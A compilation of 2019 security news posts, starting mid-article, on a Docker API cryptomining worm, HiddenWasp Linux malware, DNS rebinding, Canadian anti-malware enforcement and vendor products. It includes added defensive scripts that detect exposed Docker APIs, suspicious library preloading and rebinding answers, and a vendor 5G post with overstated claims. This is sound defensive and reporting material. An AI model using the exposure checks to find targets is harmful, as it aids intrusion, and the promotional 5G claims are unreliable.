A GitHub user reporting this issue writes, “This image is a worm/botnet/whatever targeting unsecured Docker API instances (port tcp/2375)…It uses Tor to update its mining config and continuously scrapes Shodan for exposed Docker instances (with a hardcoded user/pass which I changed) to infect them as well. It also sets up an SSH server, with a hashed password for the root user (basically a backdoor account).”

The Bleeping Computer report explains how it all works. The malicious Docker images are deployed automatically by a script that looks for exposed APIs and remotely creates malicious containers using Docker commands; each container also starts an SSH daemon that enables remote communication with the hackers. A custom-built Monero coin-mining binary is launched in the background while, simultaneously, a scanning process based on a third script looks for more victims using the Shodan API.

The report explains further, “The list of vulnerable hosts gets written to an iplist.txt file which is checked for duplicates, with all the new targets also being scanned for existing cryptocurrency-mining containers which will be deleted if found…The entire list of IP addresses is then sent to the campaign operators’ command-and-control servers ‘to deploy additional containers to other exposed hosts based on the IP list. It then loops to the beginning of the routine stated earlier with a new host.’”
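The precondition for this whole chain is a Docker daemon serving its remote API over plain TCP. The check below, an added example that is not code from Trend Micro, Alibaba Cloud or the article, parses a dockerd command line (for instance the ExecStart= line of docker.service) and reports that exposure; it assumes dockerd's -H/--host and --tlsverify options, and the three command lines are constructed samples.

```shell
#!/bin/sh
# Added example: decide from a dockerd command line whether the remote API is
# reachable over TCP without TLS client verification, the tcp/2375 exposure
# that the campaign above hunts for via Shodan.

# Prints every tcp:// listener passed to dockerd with -H or --host, one per
# line. Both "-H tcp://..." and "--host=tcp://..." spellings are handled.
tcp_listeners() {
  printf '%s\n' "$1" | awk '{
    for (i = 1; i <= NF; i++) {
      v = ""
      if ($i == "-H" || $i == "--host") v = $(i + 1)
      else if ($i ~ /^(-H|--host)=/) { v = $i; sub(/^[^=]*=/, "", v) }
      if (v ~ /^tcp:\/\//) print v
    }
  }'
}

# Returns 0 when at least one tcp:// listener is configured and --tlsverify is
# absent, i.e. anyone who can reach the port can drive the Docker API.
api_exposed() {
  [ -n "$(tcp_listeners "$1")" ] || return 1
  if printf '%s\n' "$1" | grep -Eq '(^|[[:space:]])--tlsverify([[:space:]=]|$)'; then
    return 1
  fi
  return 0
}

# One-line verdict for reporting.
verdict() {
  if api_exposed "$1"; then
    printf 'EXPOSED: unauthenticated API on %s\n' "$(tcp_listeners "$1" | tr '\n' ' ')"
  elif [ -n "$(tcp_listeners "$1")" ]; then
    printf 'OK: TCP API requires TLS client certificates\n'
  else
    printf 'OK: no TCP listener\n'
  fi
}

# Constructed samples: the misconfiguration the campaign abuses, a listener
# protected by client-certificate TLS, and the default local-socket-only setup.
EXPOSED='/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 --containerd=/run/containerd/containerd.sock'
HARDENED='/usr/bin/dockerd -H fd:// --host=tcp://0.0.0.0:2376 --tlsverify --tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem'
LOCAL='/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock'

for cmd in "$EXPOSED" "$HARDENED" "$LOCAL"; do verdict "$cmd"; done
```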

Also read:

Cryptocurrency Mining Service Coinhive Set to Shut Down

Firefox to Offer Users Automatic Protection Against Cryptocurrency Mining Malware

Cryptocoin Mining Malware On The Rise

The post Compromised Docker Hosts Use Shodan for Cryptocurrency Mining appeared first on .

Chrome extension devs must drop deceptive installation tactics

After announcing its intention to limit third-party developers’ access to Chrome’s webRequest API, which is used by many ad-blocking extensions to filter out content, Google has followed up with announcements for a few more changes meant “to create stronger security, privacy, and performance guarantees”:

  • Chrome extension developers must ditch any deceptive installation tactic they have been using
  • Extensions must only request access to the appropriate data needed to implement their features
  • Extensions that handle user-provided … More

The post Chrome extension devs must drop deceptive installation tactics appeared first on Help Net Security.

UK Universities Facing Daily State-Sponsored Attacks


UK universities are facing increased attacks from state-sponsored hackers, who are targeting their research programs.

According to a survey of 75 senior IT leaders across 68 UK universities by VMware and Dell EMC, a quarter of respondents said their institution is targeted on a daily basis, while one in 10 strongly agreed that a successful attack on their research could have a harmful impact on the lives of UK citizens.

The research also found that 24% of UK universities believed their security and defense research may have already been infiltrated, while over half (53%) said a cyber-attack on their institution has led to research ending up in foreign hands.

John Chapman, CISO, UK Public Sector at Dell EMC, said: “In conducting research that may shape the future of the nation and its citizens, universities are under the microscope of some of the world’s most well-resourced and potent cyber-attackers. We hope this study will encourage them to look critically at their cybersecurity readiness. Universities must do more to protect themselves, and the sensitive information they hold, against the ever-expanding range of increasingly sophisticated threats.”

Specifically, cyber-criminals target scientific (54%), medical (50%), economic (37%) and defense research (33%). The research also found that 49% of university IT leaders recognize that a lack of IT investment is one of the forces driving the need for more robust cybersecurity practices.

In a statement sent to Infosecurity, Universities UK said: "Data security is an absolute priority for higher education providers and students alike. Universities UK is working with university leaders and the National Cyber Security Centre to help improve and strengthen security practices to better protect the sector from cyber threats. This includes the development of robust guidance on cybersecurity which we will release later this year.”

The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains

vpnMentor researchers have recently discovered that hotel brands managed by The Pyramid Hotel Group have suffered a data leak.

vpnMentor experts have discovered that hotel brands managed by The Pyramid Hotel Group, including Marriott, have suffered a data leak.

vpnMentor’s research team discovered the unprotected server through port scanning to examine known IP blocks.

Researchers discovered 85.4GB of security audit logs; the exposed data also includes monitoring and alerts, reported system errors, misconfigurations, policy violations, potential attempted malicious breaches, and other cybersecurity events. The unsecured data also includes personally identifying information (PII) of employees.

The exposed data dates back to April 19, 2019, likely the date of the system setup or reconfiguration that is the root cause of the leak.

The unsecured server exposed audit logs generated by Wazuh, an open-source intrusion detection system used by the company.

“The Pyramid Hotel Group utilizes Wazuh – an open source intrusion detection system – on an unsecured server that is leaking information regarding their operating systems, security policies, internal networks, and application logs.” reads the post published by vpnMentor.


The Pyramid Hotel Group manages hospitality and resort properties in the US, Hawaii, the Caribbean, Ireland, and the UK; its portfolio includes locations of several brands such as Marriott, Sheraton, Plaza and Hilton, as well as other independent hotels.

Data leaked by the company could be used by attackers to gather information about hotels’ network and security measures implemented to protect them. This information could be used by hackers in later attacks.

Below is the timeline of discovery:

  • 5/27/19: Breach discovered by vpnMentor Research team
  • 5/28/19: Informed PHG of breach
  • 5/28/19: Received acknowledgement from PHG
  • 5/29/19: Data leak closed. Problem resolved.

Recently vpnMentor experts discovered an unprotected database impacting up to 65% of US households.


Pierluigi Paganini

(SecurityAffairs – Pyramid Hotel Group, data leak)

The post The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains appeared first on Security Affairs.

Cybersecurity in a 5G World, What You Should Know

These days, it seems that all people can talk about is 5G technology and how it will change the world. If you don’t quite understand the magnitude of what 5G means, you’ve come to the right place.

Today, we will explore the capabilities of 5G technology, various benefits, and how cybersecurity ties into all the hoopla (you didn’t think that we’d forget about cybersecurity, right?).


What is 5G?

If you do a quick Google search, you’ll probably find a glut of information detailing 5G and the technical reasons why it is so good, so we’ll try to keep things as simple as possible.

First off, to keep things simple, the ‘G’ in 5G, 4G, 3G, etc. all stand for “Generation.” Essentially, they are upgraded versions of wireless signal strength and speed at which data can travel.

For newer generations (reminder: the higher the G the better), such as 5G, this type of wireless signal will be capable of pushing data at peak speeds that are more than 20 times faster than 4G.

In terms of latency, which is a fancy term for data communication delays, 5G is more than 100 times faster than 4G.

In practice this means that 5G will have virtually zero chance of ever experiencing the random drops or speed slowdowns that plague 4G networks right now.

If you thought your 4G mobile speed was already lightning fast, then you’re in for quite a ride with 5G.

To help you better understand just how fast 5G can actually be, here is a quick overview of the time it would take for different wireless generations to download a standard HD movie (roughly 3GB file size) according to Lifewire:

  • 3G: 1 hour and 8 minutes
  • 4G: 40 minutes
  • 4G LTE: 27 minutes
  • 5G: 35 seconds

As you can see, the jump in data speeds is quite stark. Add in the fact that the network connection will always be stable and connected, and we have some pretty powerful stuff on our hands.

But do we actually need this kind of ridiculous speed in our lives? The answer is YES!


What Will 5G Be Used For?

Now that we understand just how fast 5G actually is, then we can understand why we need this in our lives (no, it isn’t for you to download Netflix movies really fast, although most people will use it for that exact reason).

5G actually will serve a major purpose in our lives and that will come in the form of the Internet of Things (IoT).

IoT is essentially a technology that enables us to connect all of our devices, appliances, vehicles, and even our homes to the internet. Check our previous blog post where we discuss this more in depth.

Wait, but can’t we already connect these items to the internet through 4G? Yes, this is indeed true, but 4G would really be limited to simple data retrieval like updating the weather, downloading new GPS maps, etc.

This is due to the fact that 4G’s maximum throughput (another fancy schmancy term for maximum data flow through the internet and your devices) peaks around 1 Gbps (gigabits per second) while 5G hits the 20 Gbps range.

Why is this even important? Well, this is what makes 5G the true difference maker in taking IoT to a whole different realm of possibilities.

Since 5G has much faster speeds and low-latency connections, we can now realistically pursue autonomous vehicles, remotely controlled machines, or even surgeries performed online by doctors from around the world. The last one is a bit of a ways away, but it’s certainly within the realm of possibility.

Here’s an example of how South Korea is showcasing its 5G capabilities. The video below shows how companies in the future could begin remotely controlling heavy machinery at dangerous sites with 5G’s low latency and high speeds.

This could forever change how companies operate by enabling true experts to handle complex machines all without leaving their bedroom or even coming close to risking their lives.

Where Does Cybersecurity Fit?

As quick as we can imagine the amazing possibilities that 5G technology could provide, we need to really consider the dangers that come with such power. The biggest elephant in the room for future IoT devices connected by 5G technology will be the threat of cyber hackers.

Imagine a scenario where your loved one is having surgery performed remotely by one of the world’s most accomplished surgeons that is located halfway around the world. This situation could go one of two ways. It would either be a truly world changing event or it could simply be a disaster waiting to happen.

The scary part is that since remote connection only requires a connection to the internet, then this automatically leaves us exposed and vulnerable to cyber attacks. We don’t even want to think of the issues that could spring up if a hacker could maliciously take over a remote surgery in the future.

Now, the even scarier part is that since the rollout of 5G is still in its infancy, the thought of cybersecurity has not really crossed the minds of manufacturers and technology providers.

This could lead to a situation where a major hacking episode will scare everyone straight and bring a high priority red flag towards integrating cybersecurity. But we are here today to argue that cybersecurity needs to be just as important as the underlying technology here.

The issue is that most of these connections and data will be passed through new communications protocols. For instance, data travelling from an automobile will not rely on the same protocols as a simple blog about your favorite travel destinations.

This poses problems for many cybersecurity vendors who are at a disadvantage in protecting this fast growing market.

How Cloudbric Can Help

By leveraging our years of award winning web application security experience, as well as the development of new IoT based threat detection systems, we hope to shift the importance of cybersecurity into the IoT future.

Throughout time the internet has been somewhat disjointed from our lives. Back in the early days of the internet, users had to connect online through dial up services. As we continued to progress with connectivity, the closest the internet has come into our lives is through our mobile phones.

However, the future will be quite different once internet-connected automobiles, household appliances, heavy machinery, etc. become a much more polished and prominent technology in our lives. This calls for cybersecurity to play a far more central role to ensure the safety and wellbeing of all users.

Here at Cloudbric, we will be leveraging our new patented deep learning detection and threat filtering system to help monitor data communications for IoT based devices.

Our new solution will be part of a growing suite of solutions at Cloudbric where we are focused on bringing our enterprise security experience to the general user crowd.

In the future, autonomous automobiles and even household appliances will be connected via the Cloudbric IoT security platform, which filters data in and out of each device. This will not only ensure high performance of each device, but will protect the end users from harmful spying, remote manipulation of the device itself, and so on.


Whenever people think of 5G technology, their thoughts are extremely short sighted in the fact that they only concern themselves with speed for their mobile phones or PC. However, 5G technology’s true purpose and intention is to bring IoT technology to the forefront.

In other words, 5G will open our eyes to a whole new world of limitless possibilities now that daily appliances and a new class of devices will be connected to the internet.

This will make even the wildest of dreams become a reality, such as deploying the world’s best surgeon to perform robotic real time connected surgery from halfway across the world.

Although this opens so many positive doors for mankind, cyber threats will certainly play a central role since these devices will need to be connected to the internet at all times. This leaves IoT appliances and their users vulnerable to cyber attacks.

Allowing the IoT world to flourish and protect its users will be a tough task, but this is where cybersecurity vendors will become a necessity. Security vendors are not without their challenges.

Protecting IoT data communications requires new solution technology that is able to monitor, detect, and block attacks aimed at its protocols. Cloudbric will be one of a handful of companies focusing resources to this endeavor within the next year.

In summary, 5G technology, with its impressive speed, stability, and connectivity, will power our future. As a society, we need to be heavily prepared for the risks involved in having all devices around our lives connected to the internet and even powered remotely by people across the globe.

The time for cybersecurity is now, and the ability of vendors to protect users will be the difference maker.

The post Cybersecurity in a 5G World, What You Should Know appeared first on Cloudbric.

Siemens LOGO!, a PLC for small automation projects, open to attack

LOGO!, a programmable logic controller (PLC) manufactured by Siemens, sports three vulnerabilities that could allow remote attackers to reconfigure the device, access project files, decrypt files, and access passwords. About LOGO! LOGO! is an intelligent logic module meant for small automation projects in industrial (control of compressors, conveyer belts, door control, etc.), office/commercial and home settings (lighting control, pool-related control tasks, access control, etc.). It is deployed worldwide and can be controlled remotely. About the … More

The post Siemens LOGO!, a PLC for small automation projects, open to attack appeared first on Help Net Security.

Researchers fight ransomware attacks by leveraging properties of flash-based storage

Ransomware continues to pose a serious threat to organizations of all sizes. In a new paper, “Project Almanac: A Time-Traveling Solid State Drive,” University of Illinois students Chance Coats and Xiaohao Wang and Assistant Professor Jian Huang from the Coordinated Science Laboratory look at how they can use the commodity storage devices already in a computer, to save the files without having to pay the ransom. Recovering data encrypted by a variety of ransomware families … More

The post Researchers fight ransomware attacks by leveraging properties of flash-based storage appeared first on Help Net Security.

New infosec products of the week: May 31, 2019

SailPoint Predictive Identity platform: The future of identity governance SailPoint unveiled the SailPoint Predictive Identity platform, the intelligent cloud identity platform of the future that accelerates the industry to the next generation of identity governance. The solution automates identity processes using AI-driven recommendations while finding new areas of access and bringing them under governance with auto-discovery. Zyxel SD-WAN gets security, usability and speed boost Zyxel SD-WAN provides a reliable and secure WAN through an annual … More

The post New infosec products of the week: May 31, 2019 appeared first on Help Net Security.

What mechanisms can help address today’s biggest cybersecurity challenges?

In this Help Net Security podcast, Syed Abdur Rahman, Director of Products with unified risk management provider Brinqa, talks about their risk centric knowledge-driven approach to cybersecurity problems like vulnerability management, application security and cloud and container security. Here’s a transcript of the podcast for your convenience. Hi, my name is Syed Abdur and I’m the Director of Products at Brinqa, where I’m responsible for product management and technical product marketing. Brinqa is a cyber … More

The post What mechanisms can help address today’s biggest cybersecurity challenges? appeared first on Help Net Security.

Two-Step Verification

Two-step verification is one of the best steps you can take to secure any account. Two-step verification is when you require both a password and a code sent to or generated by your mobile device. Examples of services that support two-step verification include Gmail, Dropbox and Twitter.

Researchers spot manipulated photos and video using AI-driven imaging system

To thwart sophisticated methods of altering photos and video, researchers at the NYU Tandon School of Engineering have demonstrated an experimental technique to authenticate images throughout the entire pipeline, from acquisition to delivery, using artificial intelligence (AI). In tests, this prototype imaging pipeline increased the chances of detecting manipulation from approximately 45 percent to over 90 percent without sacrificing image quality. Determining whether a photo or video is authentic is becoming increasingly problematic. Sophisticated techniques … More

The post Researchers spot manipulated photos and video using AI-driven imaging system appeared first on Help Net Security.

Is This The Start Of Open Source Malware for Linux?

Linux is considered a more secure and privacy-focused operating system than Windows, not only because of its low market share (only 2% of all installed desktop operating systems) but also due to its architecture, which is patterned after Unix. However, a device connected to the Internet cannot approach absolute security; that in itself is a contradiction in terms, regardless of the operating system used. Intezer Labs, represented by its security researcher Ignacio Sanmillan, has revealed that a malware named HiddenWasp is specifically designed to target Linux machines, infecting its victims with a rootkit-like process. A Chinese hacker group previously used a malware named Winnti to perform the same attack against Linux, which led Sanmillan to attribute HiddenWasp to the same group.

“We found some of the environment variables used in an open-source rootkit known as Azazel. In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from [the] Elknot [malware] that could have been shared in Chinese hacking forums,” explained Sanmillan.

Intezer Labs researchers investigated the Adore-ng rootkit, an open source program a portion of whose code was previously used by the Mirai malware. A small portion of the rootkit's properties is similar to the Azazel rootkit. HiddenWasp contains a rootkit component that closely resembles Adore-ng. “We observed that [the HiddenWasp] files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong,” added Sanmillan.

As of this writing, Sanmillan’s team still does not know which Chinese group is behind the development of the malware. It takes a lot of effort to infect a Linux system, as the user must type the root password in order to install software deep into the system. Since the user has no root access by default on a Linux system, all HiddenWasp can do is install its rootkit component as a user-level process. The team continues to investigate the malware, as the component of the second payload is not yet known, but it most probably has something to do with the RAT module of HiddenWasp.
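A user-level rootkit that cannot touch the kernel has to hook processes from user space, and the open-source Azazel rootkit mentioned above does that through the dynamic loader's preload mechanism (`/etc/ld.so.preload` and the `LD_PRELOAD` variable). The audit below is an added defender-side example, not code from Intezer or this article; it takes the preload file contents and a process environment as plain inputs so it runs on constructed samples, and the trusted and suspect directory lists are assumptions for this example rather than anything the article states.

```python
import os
import re
from typing import Dict, List

# Directories from which preloaded shared objects are normally expected to come (assumption).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")

# Locations a persistent user-level implant tends to be dropped in (assumption).
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/", "/root/")


def audit_preload_entries(entries: List[str], source: str) -> List[str]:
    """Return one finding string per suspicious shared-object path in `entries`."""
    findings = []
    for path in entries:
        path = path.strip()
        if not path:
            continue
        reasons = []
        if not path.startswith(TRUSTED_LIB_DIRS):
            reasons.append("outside standard library directories")
        if path.startswith(SUSPECT_DIRS):
            reasons.append("in a world-writable or home directory")
        if any(part.startswith(".") for part in path.split("/") if part):
            reasons.append("hidden path component")
        if not path.endswith(".so") and ".so." not in path:
            reasons.append("does not look like a shared object")
        if reasons:
            findings.append(f"{source}: {path} ({'; '.join(reasons)})")
    return findings


def audit_ld_so_preload(contents: str) -> List[str]:
    """/etc/ld.so.preload holds whitespace-separated library paths, usually one per line."""
    entries = [p for line in contents.splitlines() for p in line.split()]
    return audit_preload_entries(entries, "/etc/ld.so.preload")


def audit_process_env(pid: int, environ: Dict[str, str]) -> List[str]:
    """LD_PRELOAD in a process environment is a colon- or space-separated list."""
    value = environ.get("LD_PRELOAD", "")
    entries = re.split(r"[:\s]+", value) if value else []
    return audit_preload_entries(entries, f"pid {pid} LD_PRELOAD")


def audit_live_host() -> List[str]:
    """Run the same checks against the running system (Linux /proc layout)."""
    findings = []
    try:
        with open("/etc/ld.so.preload") as f:
            findings += audit_ld_so_preload(f.read())
    except FileNotFoundError:
        pass  # absence of the file is the normal state on most distributions
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/environ", "rb") as f:
                raw = f.read().split(b"\0")
        except OSError:
            continue  # process exited or is not ours to read
        env = dict(kv.decode(errors="replace").split("=", 1) for kv in raw if b"=" in kv)
        findings += audit_process_env(int(pid), env)
    return findings


if __name__ == "__main__":
    # Constructed sample input, not a real capture: one benign entry, one suspicious one.
    sample = "/usr/lib/x86_64-linux-gnu/libfakeroot/libfakeroot-0.so\n/tmp/.cache/libselinux.so\n"
    for finding in audit_ld_so_preload(sample):
        print(finding)
    if os.path.isdir("/proc"):
        for finding in audit_live_host():
            print(finding)
```

Run as root to read every process's environment; as an unprivileged user the `/proc/<pid>/environ` reads for other users' processes fail and are skipped. A clean host normally has no `/etc/ld.so.preload` at all, so any entry there deserves a look even if it sits in a trusted directory.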

“Unfortunately, I don’t know what is the initial infection vector. Based on our research, it seems most likely that this malware was used in compromised systems already controlled by the attacker. From our research, it looks like an implant from a targeted attack. It’s hard to say if it’s used by [a] nation-sponsored attacker or someone else, but it is definitely not the usual DDOS/mining malware for quick profits,” concluded Sanmillan.

Intezer has published a comprehensive article on its official blog detailing the minute-to-minute operations of HiddenWasp from the moment it arrives on a vulnerable Linux installation. The open source nature of Linux being matched by a somewhat “open source” malware in HiddenWasp may start a new trend of open source malware targeting Linux hosts.


The post Is This The Start Of Open Source Malware for Linux? appeared first on .

Dolos DNS Rebinder: What You Need to Know

Although DNS rebinding attacks have been known for over a decade now, they are only recently receiving attention as a practical attack surface. In the last year, quite a few popular products have been shown to lack DNS rebinding protections, and as a result, someone could operate them remotely using a malicious web site. Manufacturers […]… Read More
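The "protections" the paragraph says these products lack come in two standard forms, and the following is an added example of both, not code from the Tripwire post: a service that validates the HTTP `Host` header (a rebinding request arrives with the attacker's hostname in `Host`, because that is the name the browser resolved), and a resolver-side filter that refuses to map an external name to a private address. The hostnames, the `.local`/`.lan` suffix list and the sample addresses are assumptions for this example.

```python
import ipaddress
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Iterable


def host_header_allowed(host_header: str, allowed_hosts: Iterable[str]) -> bool:
    """True only if the Host header names this service by one of its own names or
    addresses. The port is stripped; IPv6 literals arrive bracketed, e.g. [::1]:8080."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    if host.startswith("["):
        end = host.find("]")
        if end == -1:
            return False
        host = host[1:end]
    elif host.count(":") == 1:           # host:port, not a bare IPv6 literal
        host = host.rsplit(":", 1)[0]
    return host in {h.lower() for h in allowed_hosts}


def resolver_should_drop(answer_ip: str, qname: str,
                         local_suffixes=(".local", ".lan", ".home.arpa")) -> bool:
    """Resolver-side mitigation (what dnsmasq's stop-dns-rebind option does): drop
    an answer that maps a non-local name to a private, loopback or link-local address."""
    ip = ipaddress.ip_address(answer_ip)
    if qname.lower().rstrip(".").endswith(local_suffixes):
        return False                     # names we expect to resolve internally
    return ip.is_private or ip.is_loopback or ip.is_link_local


class RebindSafeHandler(BaseHTTPRequestHandler):
    # Assumed names under which this device expects to be reached.
    ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1", "device.local"}

    def do_GET(self):
        if not host_header_allowed(self.headers.get("Host", ""), self.ALLOWED_HOSTS):
            # A browser that was rebound to us still sends the attacker's hostname here.
            self.send_error(400, "Bad Host header")
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")


if __name__ == "__main__":
    # Constructed resolver answers: an external name pointing at a LAN address is dropped.
    for qname, ip in (("evil.example", "192.168.1.1"), ("evil.example", "93.184.216.34"),
                      ("printer.lan", "192.168.1.20")):
        print(qname, ip, "drop" if resolver_should_drop(ip, qname) else "allow")
    HTTPServer(("127.0.0.1", 8080), RebindSafeHandler).serve_forever()
```

The `Host` check is the one a product vendor can ship, since it needs no cooperation from the network; the resolver filter is what a network operator can deploy for every device behind it, at the cost of breaking legitimate split-horizon names unless they are listed as local suffixes.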

The post Dolos DNS Rebinder: What You Need to Know appeared first on The State of Security.

StorageCraft ShadowXafe protects all data for midsize companies and MSPs irrespective of its source

StorageCraft, whose mission is to protect all data and ensure its constant availability, announced a powerful upgrade and expansion of its flagship product, StorageCraft ShadowXafe. The solution now provides enhanced features for Managed Service Providers (MSPs), including data monitoring, protection, and recovery for the entire data center, independent of size and type of machine, from a single console. It eliminates complexity, improves productivity, and reduces pressure on IT skills and training. ShadowXafe outperforms competitive offerings … More

The post StorageCraft ShadowXafe protects all data for midsize companies and MSPs irrespective of its source appeared first on Help Net Security.

Cymulate launches new Advanced Persistent Threat simulation

Cymulate, the most comprehensive, on-demand SaaS-based Breach and Attack Simulation (BAS) platform, launched its new Advanced Persistent Threat (APT) simulation. The new simulation vector enables companies to simulate a full-scale APT attack on their network with a click of a button, challenging security control mechanisms through the entire cyber kill chain, from pre-exploitation (Reconnaissance, Weaponization and Delivery) into exploitation, and even post-exploitation activities such as Command and Control (C&C) communication and data exfiltration. The APT … More

The post Cymulate launches new Advanced Persistent Threat simulation appeared first on Help Net Security.

HiveIO delivers data center intelligence with Hive Fabric 7.3

HiveIO, a company that transforms commodity data center equipment into an intelligent virtualization platform, released version 7.3 of Hive Fabric, an Artificial Intelligence-ready fabric solution that enables organizations to deploy virtualization technology without the need for vendor complexity or specialists. The latest software release provides Hive Fabric users with increased operational capabilities to further reduce the time needed to support a virtualization environment while also maximizing the performance, capacity, and spend on existing infrastructure. “Hive … More

The post HiveIO delivers data center intelligence with Hive Fabric 7.3 appeared first on Help Net Security.

Ricoh searches terabytes of global IT logs in real time with Elasticsearch

Ricoh is operationalizing the Elastic Stack to visualize and monitor two terabytes of logging data a day to watch for and react quickly to security threats across its global IT infrastructure. Prior to implementing the Elastic Stack, Ricoh’s infrastructure surveillance system wasn’t able to instantly link and detect anomalous events from the Internet all the way through to the endpoint. This was exposed during the WannaCry ransomware attack, which prompted Ricoh to issue several security … More

The post Ricoh searches terabytes of global IT logs in real time with Elasticsearch appeared first on Help Net Security.

New Context LS/IQ Lite: Measure your security and compliance posture

New Context, a cybersecurity company serving highly regulated industries, launched LS/IQ Lite, a complementary subset of LS/IQ. It is designed to help enterprises see the potential of LS/IQ, a solution to implement Secure DevOps and deliver Secure Compliant Data Platforms. “Our LS/IQ early adopters are already seeing significant value in using the platform,” said Andrew Storms, VP of Product at New Context. “I am thrilled to offer a complimentary LS/IQ Lite score to help organizations … More

The post New Context LS/IQ Lite: Measure your security and compliance posture appeared first on Help Net Security.

DataVisor expands EMEA operations after seeing more demand in the region

DataVisor, the company delivering comprehensive AI-powered fraud management solutions across industries, today announced expanded operations in EMEA to address the growing need for its solutions. The company has emerged as a leader in fraud management solutions globally and is seeing more demand in the region. DataVisor already has great traction in the area – several household names in leading marketplaces and in gaming use DataVisor to detect and prevent fraud. Now, the company has its … More

The post DataVisor expands EMEA operations after seeing more demand in the region appeared first on Help Net Security.

Capsule8 names Scott Kenerly as CFO

Capsule8, the only company providing high-performance attack protection for Linux production environments, today announced the appointment of Scott Kenerly as Chief Financial Officer (CFO). The news comes on the heels of Capsule8 bolstering its leadership team to address rapid growth by naming Jim Bandanza as Chief Operating Officer/CRO and Kelly Shortridge as Vice President of Product Strategy. Scott brings 20 years of finance and accounting expertise to his role at Capsule8. He joins from Argyle … More

The post Capsule8 names Scott Kenerly as CFO appeared first on Help Net Security.

Canada Uses Civil Anti-Spam Law in Bid to Fine Malware Purveyors

Canadian government regulators are using the country’s powerful new anti-spam law to pursue hefty fines of up to a million dollars against Canadian citizens suspected of helping to spread malicious software.

In March 2019, the Canadian Radio-television and Telecommunications Commission (CRTC), Canada’s equivalent of the U.S. Federal Communications Commission (FCC), executed a search warrant in tandem with the Royal Canadian Mounted Police (RCMP) at the home of a Toronto software developer behind the Orcus RAT, a product that’s been marketed on underground forums and used in countless malware attacks since its creation in 2015.

The CRTC was flexing relatively new administrative muscles gained from the passage of Canada’s Anti-Spam Legislation (CASL), which covers far more than just junk email. Section 7 of CASL deals with the alteration of transmission data, including botnet activity. Section 8 involves the surreptitious installation of computer programs on computers or networks including malware and spyware.

And Section 9 prohibits an individual or organization from aiding, inducing, procuring or causing to be procured the doing of any of the above acts.

CRTC Director Neil Barratt said this allows his agency to target intermediaries who, through their actions or through inaction, facilitate the commission of CASL violations. Businesses found to be in violation of CASL can be fined up to $10 million; individuals can face up to a $1 million fine.

“We’re dealing with a lower burden of proof than a criminal conviction, and CASL gives us a little more leeway to get bad actors off our networks in Canada and to ultimately improve security for people here and hopefully elsewhere,” Barratt said in an interview with KrebsOnSecurity.

“CASL defines spam as commercial electronic messages without consent or the installation of software without consent or the intercepting of electronic messages,” Barratt said. “The installation of software is under Section 8, and this is one of the first major investigations under that statute.”

Barratt added that the CRTC also was counting on CASL to help tidy up the reputation of the Canadian Web hosting industry.

“We’ve been trying to make sure that service providers operating in Canada — whether or not they are Canadian — are not unduly contributing to the infection of machines and hosting malware,” Barratt said. “We have great power in CASL and Section 9 makes it a violation to aid in the doing of a violation. And this extends quite broadly, across email service providers and various intermediaries.”

The enforcement division of the CRTC recently took action against two companies — Datablocks Inc. and Sunlight Media Network Inc — for having violated CASL section 9 by disseminating online ads that caused malicious computer programs to be downloaded onto the computers of unsuspecting victims.

Under CASL, and for the purposes of verifying compliance or determining whether any of sections 6 to 9 were violated, the CRTC may compel individuals and organizations to provide any information in their possession or control, and ask a justice of the peace to issue a warrant authorizing entry into a place of residence.

It’s good to see a civil anti-spam law being used to go after people involved in selling malware couched as legitimate software, as seems to be the case with the Orcus RAT investigation. A relatively competent remote access trojan author can earn a tidy income selling their wares, but CASL may give Canadians interested in this line of work a reason to reconsider if the end result is a million dollar fine.

More to the point, Canada (anecdotally at least) seems to have far more than its fair share of computer criminals, and yet unfortunately far less appetite than many other western countries for prosecuting those individuals criminally. In this regard, CASL offers a welcome alternative.

“One of the key takeaways of CASL was that it wasn’t just about emails that were annoying people, but also the use of email as a vector to mislead or defraud people and cause harm to computers and computer networks,” Barratt said. “Our parliamentarians decided to ensure the legislature covered a broad ambit. The search warrant executed in this case was a great example of criminal and civil law enforcement working together by using our unique tools and powers under the act to achieve the greatest good we could.”

Gmail’s Confidential Mode for All G Suite Users from June 25

Gmail’s confidential mode would be available for all G Suite users from June 25.

Google had launched Gmail’s confidential mode in beta earlier in August 2018. Now, Google has announced its plans to launch the confidential mode for all G Suite users. This will happen on June 25.

Google has clarified that once the Gmail confidential mode becomes generally available for all G Suite users, it would be set to default ON for all domains with Gmail enabled, unless the user chooses to disable the feature.

Gmail Confidential Mode: What’s it?

The Gmail confidential mode makes it possible for the sender of an email to revoke a sent email or even add expiration dates to it. It will also be possible to block printing and forwarding of emails.

A blog post from the G Suite team explains it in detail; it says- “Confidential mode provides built-in information rights management controls in your emails by allowing senders to create expiration dates and revoke previously sent messages. Because a sender can require additional authentication via text message to view an email, it’s also possible to protect data even if a recipient’s email account has been hijacked while the message is active. Additionally, with confidential mode, recipients don’t have the option to forward, copy, print, or download their content or attachments.”

Thus, the sender of an email in confidential mode can configure various options, including setting an expiration or self-destruction date (the expiration can be configured from 1 day to 5 years) and demanding password entry before the mail can be opened.

The confidential mode works with all email providers because the message that is sent does not contain the actual email. The recipient receives an email containing a link to the Google servers that host the message. When the recipient clicks on the link, Google demands a login to confirm that it’s the intended recipient. Once the recipient logs in, the email is made available. If the sender realizes that the email was sent by mistake or wishes to withdraw access, opening the email in the Sent folder and clicking the Remove access button does the job.

While using the confidential mode, since the sender can require additional authentication (via text message) from the recipient to view an email, it becomes possible to protect data even if the recipient’s email account is hacked when the message is active.

